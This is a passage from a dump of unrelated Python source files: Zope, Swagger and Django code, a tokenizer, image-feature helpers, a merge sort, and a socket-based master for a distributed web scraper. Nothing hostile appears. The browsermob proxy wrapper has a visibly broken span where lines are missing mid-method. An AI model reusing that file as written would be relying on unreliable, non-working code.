THE IMPLIED\n# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS\n# FOR A PARTICULAR PURPOSE\n#\n##############################################################################\n"""Patch for Persistent to support IPersistentExtra.\n\n$Id$\n"""\nfrom DateTime.DateTime import DateTime\n\nclass PersistentUtil:\n\n def bobobase_modification_time(self):\n jar=self._p_jar\n oid=self._p_oid\n if jar is None or oid is None:\n return DateTime()\n\n try:\n t = self._p_mtime\n except:\n t = 0\n return DateTime(t)\n\n\n_patched = False\n\ndef patchPersistent():\n global _patched\n if _patched:\n return\n\n _patched = True\n\n from zope.interface import classImplements\n from Persistence import Persistent\n from App.interfaces import IPersistentExtra\n\n for k, v in PersistentUtil.__dict__.items():\n if k[0] != '_':\n setattr(Persistent, k, v)\n\n classImplements(Persistent, IPersistentExtra)\n","sub_path":"Zope/tags/2.12.22/src/App/PersistentExtra.py","file_name":"PersistentExtra.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"472097066","text":"# coding: utf-8\n\nfrom __future__ import absolute_import\nfrom datetime import date, datetime # noqa: F401\n\nfrom typing import List, Dict # noqa: F401\n\nfrom swagger_server.models.base_model_ import Model\nfrom swagger_server import util\n\n\nclass Ipv4AddressConfig(Model):\n """NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n 
\"\"\"\n\n def __init__(self, ip: str=None, prefix_length: str=None): # noqa: E501\n \"\"\"Ipv4AddressConfig - a model defined in Swagger\n\n :param ip: The ip of this Ipv4AddressConfig. # noqa: E501\n :type ip: str\n :param prefix_length: The prefix_length of this Ipv4AddressConfig. # noqa: E501\n :type prefix_length: str\n \"\"\"\n self.swagger_types = {\n 'ip': str,\n 'prefix_length': str\n }\n\n self.attribute_map = {\n 'ip': 'ip',\n 'prefix_length': 'prefixLength'\n }\n\n self._ip = ip\n self._prefix_length = prefix_length\n\n @classmethod\n def from_dict(cls, dikt) -> 'Ipv4AddressConfig':\n \"\"\"Returns the dict as a model\n\n :param dikt: A dict.\n :type: dict\n :return: The Ipv4AddressConfig of this Ipv4AddressConfig. # noqa: E501\n :rtype: Ipv4AddressConfig\n \"\"\"\n return util.deserialize_model(dikt, cls)\n\n @property\n def ip(self) -> str:\n \"\"\"Gets the ip of this Ipv4AddressConfig.\n\n The IPv4 address on the interface. # noqa: E501\n\n :return: The ip of this Ipv4AddressConfig.\n :rtype: str\n \"\"\"\n return self._ip\n\n @ip.setter\n def ip(self, ip: str):\n \"\"\"Sets the ip of this Ipv4AddressConfig.\n\n The IPv4 address on the interface. # noqa: E501\n\n :param ip: The ip of this Ipv4AddressConfig.\n :type ip: str\n \"\"\"\n\n self._ip = ip\n\n @property\n def prefix_length(self) -> str:\n \"\"\"Gets the prefix_length of this Ipv4AddressConfig.\n\n The length of the subnet prefix. # noqa: E501\n\n :return: The prefix_length of this Ipv4AddressConfig.\n :rtype: str\n \"\"\"\n return self._prefix_length\n\n @prefix_length.setter\n def prefix_length(self, prefix_length: str):\n \"\"\"Sets the prefix_length of this Ipv4AddressConfig.\n\n The length of the subnet prefix. # noqa: E501\n\n :param prefix_length: The prefix_length of this Ipv4AddressConfig.\n :type prefix_length: str\n \"\"\"\n\n self._prefix_length = prefix_length\n","sub_path":"python-flask/swagger_server/models/ipv4_address_config.py","file_name":"ipv4_address_config.py","file_ext":"py","file_size_in_byte":2540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"37867003","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /marrow/schema/transform/complex.py\n# Compiled at: 2018-12-02 18:39:07\n# Size of source mod 2**32: 4573 bytes\nimport re\nfrom inspect import isroutine\nfrom .base import Concern, Transform, DataAttribute, Attribute\n\nclass TokenPatternAttribute(DataAttribute):\n __doc__ = 'Lazy construction of the regular expression needed for token processing.'\n\n def __get__(self, obj, cls=None):\n if obj is None:\n return self\n try:\n return obj.__data__[self.__name__]\n except KeyError:\n pass\n\n separators = obj.separators\n groups = obj.groups\n quotes = obj.quotes\n if groups:\n if None not in groups:\n groups = [\n None] + list(groups)\n expression = ''.join((\n '[\\\\s%s]*' % (''.join(separators),),\n '(',\n '[%s]%s' % (\n ''.join([i for i in list(groups) if i is not None]), '?' 
if None in groups else '') if groups else '',\n ''.join(['%s[^%s]+%s|' % (i, i, i) for i in quotes]) if quotes else '',\n '[^%s]+' % (''.join(separators),),\n ')',\n '[%s]*' % (''.join(separators),)))\n value = (\n expression, re.compile(expression))\n self.__set__(obj, value)\n return value\n\n\nclass Token(Transform):\n separators = Attribute(default=' \\t')\n quotes = Attribute(default='\"\\'')\n groups = Attribute(default=[])\n group = Attribute(default=None)\n normalize = Attribute(default=None)\n sort = Attribute(default=False)\n cast = Attribute(default=list)\n pattern = TokenPatternAttribute()\n\n def native(self, value, context=None):\n value = super().native(value, context)\n if value is None:\n return\n pattern, regex = self.pattern\n matches = regex.findall(value)\n if isroutine(self.normalize):\n matches = [self.normalize(i) for i in matches]\n else:\n if self.sort:\n matches.sort()\n return self.groups or self.cast(matches)\n groups = dict([(i, list()) for i in self.groups])\n if None not in groups:\n groups[None] = list()\n for i in matches:\n if i[0] in self.groups:\n groups[i[0]].append(i[1:])\n else:\n groups[None].append(i)\n\n if self.group is dict:\n return groups\n if not self.group:\n results = []\n for group in self.groups:\n results.extend([(group, match) for match in groups[group]])\n\n return self.cast(results)\n return self.group([[match for match in groups[group]] for group in self.groups])\n\n def foreign(self, value, context=None):\n value = super().foreign(value, context)\n if value is None:\n return\n\n def sanatize(keyword):\n if not self.quotes:\n return keyword\n for sep in self.separators:\n if sep in keyword:\n return self.quotes[0] + keyword + self.quotes[0]\n\n return keyword\n\n if self.group is dict:\n if not isinstance(value, dict):\n raise Concern('Dictionary grouped values must be passed as a dictionary.')\n return self.separators[0].join([(prefix or '') + sanatize(keyword) for prefix, keywords in sorted(list(value.items())) for keyword in sorted(value[prefix])])\n if not isinstance(value, (list, tuple, set)):\n raise Concern('Ungrouped values must be passed as a list, tuple, or set.')\n value = [sanatize(keyword) for keyword in value]\n return self.separators[0].join(sorted(value) if self.sort else value)\n\n\ntags = Token(separators=' \\t,', normalize=(lambda s: s.lower().strip('\"')), cast=set)\ntag_search = Token(separators=' \\t,', normalize=(lambda s: s.lower().strip('\"')), cast=set, groups=['+', '-'], group=dict)\nterms = Token(groups=['+', '-'], group=dict)","sub_path":"pycfiles/marrow.schema-2.0.0-py2.py3-none-any/complex.cpython-37.opt-1.py","file_name":"complex.cpython-37.opt-1.py","file_ext":"py","file_size_in_byte":4102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"460323232","text":"from decimal import *\n\nkeywordDict = {}\nresultsDict = {}\n\nclass Edge(object):\n def __init__(self, node, weight = 1):\n self.weight = weight\n self.node = node\n\nclass Node(object):\n def __init__(self, name, baseWeight = 1):\n self.weight = 0\n self.name = name\n self.edges = []\n self.baseWeight = baseWeight\n\n def connect(self, node, edgeWeight):\n self.edges.append(Edge(node, edgeWeight))\n\ndef connectKeywordsToNode(keywordCountDict, node):\n createdNodes = []\n for kw, count in keywordCountDict.items():\n if kw in keywordDict.keys():\n newNode = keywordDict[kw]\n else:\n newNode = Node(kw) # create new node for every keyword\n keywordDict[kw] = newNode\n 
createdNodes.append(newNode)\n \n newNode.connect(node, count) # connect keyword to method and assign count as edge weight\n return createdNodes\n\ndef connectListToNode(names, node):\n createdNodes = []\n edgeWeight = Decimal(1) / Decimal(len(names))\n for name in names:\n newNode = Node(name)\n newNode.connect(node, edgeWeight)\n createdNodes.append(newNode)\n return createdNodes\n\ndef printGraph(kwDict):\n for kw, kwNode in kwDict.items():\n print("kw: " + kw + " -- " + str(kwNode.weight))\n for kwEdge in kwNode.edges:\n print(" -" + str(kwEdge.weight) + "--> " + kwEdge.node.name + " -- " + str(kwEdge.node.weight))\n for childEdge in kwEdge.node.edges:\n print(" -" + str(childEdge.weight) + "--> " + childEdge.node.name + " -- " + str(childEdge.node.weight))\n for infantEdge in childEdge.node.edges:\n print(" -" + str(infantEdge.weight) + "--> " + infantEdge.node.name + " -- " + str(infantEdge.node.weight))\n if len(infantEdge.node.edges):\n print(" Infant has edges...")\n\n\nif __name__=="__main__":\n repo = { \n "class1": {\n "m0":{\n "distance": 2 , \n "Add": 1\n } ,\n "m1":{\n "get": 2\n }\n } ,\n "class2":{\n "m2":{\n "ParticleFilter": 1\n }\n }\n }\n\n repoNodes = Node("repo")\n \n classNodes = connectListToNode(repo.keys(),repoNodes) \n \n for node in classNodes:\n nodeDict = repo[node.name]\n methodsNodes = connectListToNode(nodeDict.keys(), node)\n \n for method in methodsNodes:\n methodDict = nodeDict[method.name] \n keywordNodes = connectKeywordsToNode(methodDict, method)\n\n printGraph(keywordDict)\n \n","sub_path":"nodeTools.py","file_name":"nodeTools.py","file_ext":"py","file_size_in_byte":2717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"104457111","text":"\"\"\"TAGserver URL Configuration\r\n\r\nThe `urlpatterns` list routes URLs to views. For more information please see:\r\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\r\nExamples:\r\nFunction views\r\n 1. Add an import: from my_app import views\r\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\r\nClass-based views\r\n 1. Add an import: from other_app.views import Home\r\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\r\nIncluding another URLconf\r\n 1. Import the include() function: from django.urls import include, path\r\n 2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\r\n"""\r\nfrom django.contrib import admin\r\nfrom django.urls import include, path\r\nfrom rest_framework import routers\r\nfrom portalAPP import views\r\nfrom rest_framework.authtoken.views import obtain_auth_token\r\nfrom django.conf import settings\r\nfrom django.conf.urls.static import static\r\n\r\nrouter = routers.DefaultRouter()\r\n#router.register(r'Usuario', views.UsuarioViewSet)\r\n#router.register(r'Projeto', views.ProjetoViewSet)\r\n#router.register(r'Noticia', views.NoticiaViewSet)\r\n#router.register(r'Evento', views.EventoViewSet)\r\n\r\nurlpatterns = [\r\n path('admin/', admin.site.urls),\r\n path('', include(router.urls)),\r\n path('api-auth/', include('rest_framework.urls', namespace='rest_framework')),\r\n path('login/', views.Login.as_view(), name='login'),\r\n path('Usuario/', views.UsuarioView.as_view(), name='usuario'),\r\n path('Usuario/<int:pk>', views.UsuarioDetalhe.as_view(), name='usuario'),\r\n path('Usuario/', views.UsuarioRegister.as_view(), name='usuario'),\r\n path('Projeto/', views.ProjetoView.as_view(), name='projeto'),\r\n path('Projeto/<int:pk>', views.ProjetoDetalhe.as_view(), name='projeto'),\r\n path('Evento/', views.EventoView.as_view(), name='evento'),\r\n path('Evento/<int:pk>', views.EventoDetalhe.as_view(), name='evento'),\r\n path('Noticia/', views.NoticiaView.as_view(), name='noticia'),\r\n path('Noticia/<int:pk>', views.NoticiaDetalhe.as_view(), name='noticia'),\r\n path('GerarLink/', views.GerarLink.as_view(), name='gerar_link'),\r\n path('AutenticarLink/', views.AutenticarLink.as_view(), name='autenticar_link'),\r\n]\r\n\r\nif settings.DEBUG: # new\r\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)","sub_path":"TAGserver/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"119966502","text":"# This file is part of: SST (selenium-simple-test)\n# https://launchpad.net/selenium-simple-test\n#\n# Licensed under the Apache License, Version 2.0 (the "License");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an "AS IS" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport json\nimport logging\nimport requests\n\nfrom sst import config\nfrom browsermobproxy import Server\n\nlogger = logging.getLogger('SST')\n\nclass Proxy(object):\n\n proxy = None\n proxy_server = None\n test_id = None\n\n def __init__(self, test_id):\n self.test_id = test_id\n self.start_proxy()\n\n def start_proxy(self):\n self.proxy_server = Server(config.proxy_bin)\n self.proxy_server.start()\n self.proxy = self.proxy_server.create_proxy()\n if config.blacklist:\n self.set_blacklist(config.blacklist)\n self.proxy.new_har(self.test_id)\n log
HAR created: {}'\n .format(filename))\n\n def set_blacklist(self, domain_list):\n for domain in domain_list:\n self.proxy.blacklist("^https?://([a-z0-9-]+[.])*{}*.*"\n .format(domain), 404)\n logger.debug("Proxy blacklist set.")\n\n def get_blacklist(self):\n return requests.get('{}{}/blacklist'\n .format(config.proxy_api, self.proxy.port))\n","sub_path":"src/sst/proxy.py","file_name":"proxy.py","file_ext":"py","file_size_in_byte":2286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"73166583","text":"from typing import Sequence, TypeVar\n\n_Tt = TypeVar("T")\n\n\ndef sort(container: Sequence[_Tt]) -> Sequence[_Tt]:\n\t"""Sort input container with merge sort\n\t:param container: container of elements to be sorted\n\t:return: container sorted in ascending order"""\n\ta = len(container)\n\tif a <= 1:\n\t\treturn container\n\n\tx = sort(container[:a // 2])\n\ty = sort(container[a // 2: a])\n\tj = 0\n\ti = 0\n\tb = []\n\twhile i < len(x) or j < len(y):\n\t\tif not i < len(x):\n\t\t\tb.append(y[j])\n\t\t\tj += 1\n\t\telif not j < len(y):\n\t\t\tb.append(x[i])\n\t\t\ti += 1\n\t\telse:\n\t\t\t# compare heads so the merge actually interleaves in order\n\t\t\tif x[i] <= y[j]:\n\t\t\t\tb.append(x[i])\n\t\t\t\ti += 1\n\t\t\telse:\n\t\t\t\tb.append(y[j])\n\t\t\t\tj += 1\n\treturn b\n\n","sub_path":"Tasks/g1_merge_sort.py","file_name":"g1_merge_sort.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
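A quick check of the repaired merge step above (as written before, the merge always consumed from y without comparing heads), assuming the module's sort is in scope:

print(sort([5, 2, 9, 1, 5, 6]))  # expected: [1, 2, 5, 5, 6, 9]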
+{"seq_id":"68921400","text":"import scipy.ndimage as SPImage\nimport numpy as np\nfrom mahotas.features import surf\n\n# gets histogram of colors\n# n_bins is the number of bins per RGB channel so n_bins^3 colors\ndef GetColorHistogram(img_path,nbins=4):\n\timg = SPImage.imread(img_path)\n\t#equalzd_img = Exposure.equalize_adapthist(img)\n\timg = np.reshape(img,(img.shape[0]*img.shape[1],3))\n\treturn np.histogramdd(img,normed=True,range=[(0,255)]*3,bins=nbins)[0].flatten()\n\n# gets K most significant SURF points for each subspace on a nBlock by nBlock grid\ndef GetKSURFs(imname,K,nBlocks):\n img = SPImage.imread(imname,True)\n SURFs = surf.surf(img)\n height,width = img.shape\n hBlocks = np.int16(np.floor(height/nBlocks))\n wBlocks = np.int16(np.floor(width/nBlocks))\n x_bs = [ (i_h*hBlocks,(i_h+1)*hBlocks) for i_h in range(0,nBlocks) ]\n y_bs = [ (i_w*wBlocks,(i_w+1)*wBlocks) for i_w in range(0,nBlocks) ]\n ListOfSurfs = []\n for x_b in x_bs:\n x_lb,x_ub = x_b\n for y_b in y_bs:\n y_lb,y_ub = y_b\n I_X = (SURFs[:,0] >= x_lb) & (SURFs[:,0] < x_ub)\n I_Y = (SURFs[:,1] >= y_lb) & (SURFs[:,1] < y_ub)\n SURFsLocal = SURFs[I_X & I_Y,-64:]\n if len(SURFsLocal)>0:\n ListOfSurfs.append(SURFsLocal[:K])\n else:\n ListOfSurfs.append(np.zeros((1,64)))\n return ListOfSurfs ","sub_path":"ImageFeatures.py","file_name":"ImageFeatures.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"262091177","text":"from django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.index, name="index"),\n url(r'^validate$', views.validate, name="validate"),\n url(r'^show$', views.show, name="show"),\n url(r'^logout$', views.destroy, name="destroy"),\n url(r'^add$', views.add, name="add"),\n url(r'^create$', views.create, name="create"),\n url(r'^detail/(?P<id>\d+)$', views.detail, name="detail"),\n url(r'^join/(?P<id>\d+)$', views.join, name="join"),\n]","sub_path":"Python/djangoprojects/apps/belt_exam/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"114670369","text":"\"\"\"\nMaster for scraping slaves. Coordinates slaves who connect.\n\"\"\"\n\n# =======================\n# standard Module imports\n# =======================\nimport json\nimport os\n# import random\nimport socket\nimport sys\nimport threading\nimport traceback\nimport time\n\n# ==============\n# typing imports\n# ==============\n# from typing import Dict\nfrom typing import Tuple\n\nfrom _thread import LockType\n\n# ====================\n# Other module imports\n# ====================\nimport yaml\n\n# from gen_scraper import scraper\n\nLock = LockType\nThread = threading.Thread\nsockType = socket.socket # pylint: disable=C0103\naddrType = Tuple[str, int] # pylint: disable=C0103\nconnType = Tuple[sockType, addrType] # pylint: disable=C0103\n\nACK = 'ACK'.encode()\nNAK = 'NAK'.encode()\n\nclass EmptyFolderError(Exception):\n """Custom exception to raise if save folder is empty"""\n def __init__(self, fname):\n Exception.__init__(self, "no files in {0}".format(fname))\n\ndef recv(r_socket: socket.socket) -> bytes:\n """\n Takes a socket. Receives until the connection closes or a short packet arrives. Returns bytes.\n """\n\n packet_len = 1024\n data: bytes = b''\n\n while True:\n packet = r_socket.recv(packet_len)\n\n # if not packet or len(packet) < PACKET_LEN:\n if not packet:\n break\n elif len(packet) < packet_len:\n data += packet\n break\n else: data += packet\n\n return data\n\ndef send(snd_sock: socket.socket, data: bytes) -> int:\n """\n Takes socket, data. Sends data until done\n """\n\n packet_len = 1024\n\n print("SENDING DATA")\n\n while data:\n print(len(data))\n cur_len = min([len(data), packet_len])\n cur, data = data[:cur_len], data[cur_len:]\n snd_sock.send(cur)\n\n return 0\n\ndef handle_slave(slaveconn_tuple: connType, config_info: dict, work_info: dict) -> None:\n """\n Handles a connection to the slave. Determines type of communication from slave\n and sends data. 
Receives data from slave.\n\n Parameters\n ----------\n slaveconn_tuple : tuple\n tuple containing (slave connection, address)\n config_info : dict\n config dict and binary dump of config\n work_info : dict\n dict of v_set, work_loc, and r_lock\n\n Returns\n -------\n None\n\n Raises\n ------\n None\n """\n # HANDLED: this function was doing too many things.\n\n # recv type of communication\n slaveconn, address = slaveconn_tuple\n\n print('HANDLING SLAVE', address)\n\n comm_bytes = recv(slaveconn)\n # comm_bytes: bytes = slaveconn.recv(4)\n comm: str = comm_bytes.decode()\n\n # send ACK\n # slaveconn.send(ACK)\n\n print('COMM:', comm)\n\n # Send ACK if comm recognized\n if any(map(lambda x: comm in x, ['CNFG', 'WORK', 'RSLT'])):\n slaveconn.send(ACK)\n\n if 'CNFG' in comm:\n status = send_config(slaveconn, config_info)\n elif 'WORK' in comm:\n # if asking for work:\n batch_size: int = config_info['config']['batch size']\n status = send_work(slaveconn, work_info, batch_size)\n elif 'RSLT' in comm:\n # if sending back results:\n status = get_result(slaveconn, work_info)\n\n else:\n # SEND NAK. SLAVE RETRIES.\n slaveconn.send(NAK)\n status = 1\n\n print('Slave', address, 'finished with status:', status)\n\ndef send_config(slaveconn, config_info) -> int:\n """\n Send config to slave.\n params:\n slaveconn: connection to socket\n config_info: dict containing key 'object_dump'\n """\n\n # print('CNFG')\n\n status = recv(slaveconn)\n print('Send cfg:', status.decode())\n\n object_dump: str = config_info['object_dump']\n # send config\n # convert config to bytes (will have to use pickle)\n # print(byte_len)\n # byte_len: bytes = struct.pack('!I', len(object_dump))\n # print(byte_len)\n # slaveconn.send(byte_len)\n slaveconn.send(object_dump.encode())\n slaveconn.close()\n\n return 0\n
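A hedged sketch of the slave side of the exchange that handle_slave/send_config implement above; host and port mirror the master's bind('', 666). Note the framing convention recv/send rely on: a message is considered complete when a packet shorter than 1024 bytes arrives, so a message whose length is an exact multiple of 1024 would stall until the peer closes the socket.

import socket

# hypothetical slave requesting the config from the master
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('127.0.0.1', 666))   # the master listens on port 666
s.send(b'CNFG')                 # announce the communication type
if s.recv(1024) == b'ACK':      # master ACKs recognized commands
    s.send(b'ready')            # the status string send_config logs
    data = b''
    while True:                 # same short-packet framing as recv() above
        packet = s.recv(1024)
        data += packet
        if not packet or len(packet) < 1024:
            break
    print(len(data), 'bytes of config received')
s.close()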
\ndef send_work(slaveconn: socket.socket, work_info: dict, batch_size: int) -> int:\n """\n Send work to slave\n """\n\n # status = recv(slaveconn)\n # print('Send work:', status.decode())\n\n v_set: set = work_info['v_set']\n work_loc = work_info['work_loc']\n r_lock = work_info['r_lock']\n # send queue chunk.\n # in dict, track IP : (chunk, time)\n\n slave_id = recv(slaveconn)\n slave_id = slave_id.decode()\n print('ID:', slave_id)\n\n # check work_loc for work which has been out for too long.\n # Assign that instead of new chunk if so.\n # If a work chunk has been out for too long, reassign and resend\n # reassign after 5 minutes\n reassign_time = 300\n\n v_chunk = []\n for _x in work_loc:\n chunk = work_loc[_x]\n out_time = chunk[1]\n if time.time() - out_time > reassign_time:\n # if the chunk has been out for longer than 5 minutes, reassign\n # break and then go\n v_chunk = chunk[0]\n break\n\n if v_chunk == []:\n # print('NO EXPIRED CHUNK FOUND')\n # if no expired v_chunk was found\n\n # must use pop so we mutate the list.\n\n # filter chunks greater than 5 minutes.\n # if non-empty, first chunk is v_chunk. Pop from list, reassign.\n # else new chunk.\n chunk_len = min([batch_size, len(v_set)]) # length is either batch size or size of queue\n\n r_lock.acquire()\n # NOTE: MUST use pop to mutate the list at mem addr\n # NOTE: v_list is now a set (v_set).\n # Get a chunk of the v_set.\n \n print(type(v_set))\n # print(v_list)\n v_chunk = [v_set.pop() for _ in range(chunk_len)]\n # print(v_chunk)\n r_lock.release()\n\n r_lock.acquire()\n # add chunk to work loc with time\n work_loc[slave_id] = (v_chunk, time.time())\n r_lock.release()\n\n\n chunk_json = json.dumps(v_chunk)\n # print(chunk_json)\n # print(byte_len)\n # byte_len = struct.pack('!I', len(chunk_pickle))\n # slaveconn.send(byte_len)\n send(slaveconn, chunk_json.encode())\n # slaveconn.send(chunk_json.encode())\n\n slaveconn.close()\n\n return 0\n\ndef get_result(slaveconn: socket.socket, work_info: dict) -> int:\n """\n Receives result from slave.\n\n Parameters\n ----------\n slaveconn : socket.socket\n connection to the slave\n\n work_info : dict\n dict containing v_set, work_loc, r_lock\n\n Returns\n -------\n status : int\n error code\n """\n # append should be thread safe\n # append results to queue\n # send new chunk\n # update IP dict\n\n # print(type(slaveconn_tuple))\n # address: addrType\n # slaveconn, _ = slaveconn_tuple\n\n v_set: set = work_info['v_set']\n work_loc = work_info['work_loc']\n r_lock: Lock = work_info['r_lock']\n\n # slave_id: bytes = slaveconn.recv(4)\n # print(slave_id)\n\n # res_len_bytes: bytes = slaveconn.recv(4)\n # res_len: int = struct.unpack('!I', res_len_bytes)[0]\n # config_len = int(config_len)\n\n slaveconn.send(ACK)\n\n data = recv(slaveconn)\n # res_pickle: bytes = slaveconn.recv(res_len)\n slave_id, res = json.loads(data)\n print('SLAVE ID:', slave_id)\n print('RES:', res)\n\n # print(res)\n\n # for x in res:\n # v_list.append(x)\n\n # add each new url to url_set\n # if the url is not already there, add it to set and go\n r_lock.acquire()\n v_set.update(res)\n print(v_set)\n\n # print(work_loc.keys())\n try:\n work_loc.pop(str(slave_id))\n except KeyError:\n\n traceback.print_exc()\n print('ERROR WORK LOC:', work_loc)\n raise\n r_lock.release()\n\n return 0\n\ndef get_config(directory: str = '', cfg_file_name: str = '') -> Tuple[dict, str]:\n\n """\n Takes the dir and config YAML location and returns the config dict\n\n params:\n directory: dir where config.yaml is located\n cfg_file: name of config file\n returns:\n config: parsed config dict\n config_text: raw text of config\n """\n\n\n print('STARTING MASTER')\n # print(directory)\n\n # config file location\n\n cfg_path: str = os.path.join(directory, cfg_file_name)\n\n # master reads and parses config file, creates objects for scraping\n with open(cfg_path, 'r') as cfg_file:\n config_text: str = cfg_file.read()\n\n # NOTE: why did I do the commented out line?\n # config = yaml.load(config_text.encode())\n config: dict = yaml.load(config_text)\n\n return config, config_text\n\n # send entire user-created file over socket.\n # slave uses cmdline to exec file.\n\n\n # u_scraper.test()\n\n # print(config)\n\n # master generates initial queue\n\ndef get_object_dump(directory: str, config: dict, config_text: str) -> str:\n """\n Take config and return a JSON dump of scraper and processor\n params:\n directory: location of objects\n config: config from get_config\n returns:\n object_dump: JSON dump of [config, scraper, processor]\n """\n\n scraper_loc = os.path.join(directory, config['scraper']['loc'])\n\n\n with open(scraper_loc) as u_file:\n 
scraper_script = u_file.read()\n\n scraper_loc = os.path.join(directory, config['processor']['loc'])\n with open(scraper_loc) as u_file:\n processor_script = u_file.read()\n\n object_dump: str = json.dumps([config_text, scraper_script, processor_script])\n\n return object_dump\n\n\ndef update_saves(save_folder: str, v_set: set, work_loc: dict, last_time: float = None) -> int:\n \"\"\"\n Takes the current set and dict of work info and saves them gradually throughout the day.\n Saves every five minutes, then creates hourly save & del five minute files.\n Then creates daily and del hourly files.\n \"\"\"\n\n # TODO: in config, specify name of scrape. Save in folder names after scrape.\n # TODO: ?return name of file created?\n\n # M_(timestamp).txt\n # H_(timestamp).txt\n # D_(timestamp).txt\n\n if last_time is None:\n last_time = time.time()\n elif time.time() - last_time < 300:\n return last_time\n\n # make save folder if not present\n if not os.path.exists(save_folder):\n os.mkdir(save_folder)\n\n # NOTE: MAY want to remove this and just dir switch constantly\n # this function\n # switch dir\n # |\n # | do saving\n # |\n # switch back up\n # if not in the save folder, change to it.\n if not save_folder == os.path.basename(os.getcwd()):\n os.chdir(save_folder)\n\n files = [f for f in os.listdir() if os.path.isfile(f)]\n\n prefix = 'M_'\n timestamp = str(int(time.time()))\n\n if len([x for x in files if 'M_' in x]) > 12:\n # if hour files < 24\n prefix = 'H_'\n elif len([x for x in files if 'H_' in x]) > 24:\n # make a day file\n prefix = 'D_'\n\n with open(prefix + timestamp + '.sbkp', 'w') as _f:\n # sets are NOT JSON serializable\n # convert v_list to list\n v_list = list(v_set)\n dump = json.dumps([v_list, work_loc])\n _f.write(dump)\n\n # remove old file group if a larger one has been written\n if prefix == 'H_' or prefix == 'D_':\n remove_pref = 'M_' if prefix == 'H_' else 'H_'\n files = [f for f in files if remove_pref in f]\n for _f in files:\n os.remove(_f)\n\n # NOTE: change back to top level folder\n # return the new time\n return time.time()\n\ndef restore_from_save(save_folder: str) -> (list, dict):\n \"\"\"\n Restore from a set of save files in the given folder name.\n \"\"\"\n\n def strip_fname(fname: str) -> str:\n \"\"\"\n Strip filename to just UNIX time.\n \"\"\"\n fname = fname[2:]\n fname = fname[:-5]\n return fname\n\n # change into save folder\n os.chdir(save_folder)\n # get most highest timestamp from proper folder\n files = [f for f in os.listdir() if os.path.isfile(f)]\n\n if len(files) <= 0:\n raise EmptyFolderError(save_folder)\n\n files = [strip_fname(f) for f in files]\n\n files.sort()\n latest_time = list(reversed(files))[0]\n\n latest_file = [f for f in os.listdir() if latest_time in f][0]\n\n with open(latest_file, 'r') as _f:\n load_str = _f.read()\n v_set, work_loc = json.loads(load_str)\n\n # change out of save folder\n os.chdir('..')\n\n return v_set, work_loc\n\ndef run(config: dict, object_dump: bytes, v_set: set, work_loc: dict) -> None:\n\n \"\"\"\n run loop of the scraper\n params:\n config: config from get_config\n config_dump: dump from get_object_dump\n \"\"\"\n\n save_folder = config['scrape name']\n\n r_lock = threading.Lock()\n\n # populate v_list with 1 initial entry\n # data is passed with dict w/ function_name, args, data{}\n # Do not put in init if already initialized from save file\n print('v_set:', v_set)\n print('work_loc:', work_loc)\n\n last_time = 0\n\n if not v_set and not work_loc:\n for _x in config['start']:\n init_bundle = 
{'function':_x['function'], 'url':_x['url'], 'data':{}}\n            # convert to string.\n            bundle_str: str = json.dumps(init_bundle)\n            print(bundle_str)\n            v_set.update({bundle_str: None})\n            print(v_set)\n\n        last_time = update_saves(save_folder, v_set, work_loc)\n\n    # print(v_list)\n\n    # receives connection\n    slave_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    slave_sock.bind(('', 666))\n    slave_sock.listen(5)\n\n    # enters main loop\n    while True:\n\n        slaveconn = slave_sock.accept()\n        # print('Got conn from', address)\n        # now do something with the clientsocket\n        # in this case, we'll pretend this is a threaded server\n        # construct v_chunk\n\n        config_info = {'config':config, 'object_dump': object_dump}\n        work_info = {'v_set':v_set, 'work_loc': work_loc, 'r_lock':r_lock}\n\n        print('Len v_set:', len(v_set))\n\n        slave_thread: Thread = threading.Thread(\n            target=handle_slave,\n            args=[slaveconn, config_info, work_info]\n        )\n        slave_thread.start()\n\n        last_time = update_saves(save_folder, v_set, work_loc, last_time)\n\n\ndef main(argv: list = None) -> int:\n    \"\"\"\n    Main function of program.\n    \"\"\"\n    # main loop of\n    # argv[1] is cwd, argv[2] is config file loc\n    if argv is None:\n        argv = sys.argv\n    # config_tuple = Tuple[dict, str]\n    config: dict\n    config_text: str\n\n    config, config_text = get_config(directory=argv[1], cfg_file_name=argv[2])\n    object_dump: bytes = get_object_dump(argv[1], config, config_text)\n\n    v_set: set = set()  # set of pages to visit and metadata\n    work_loc: dict = {}  # dict of work location of 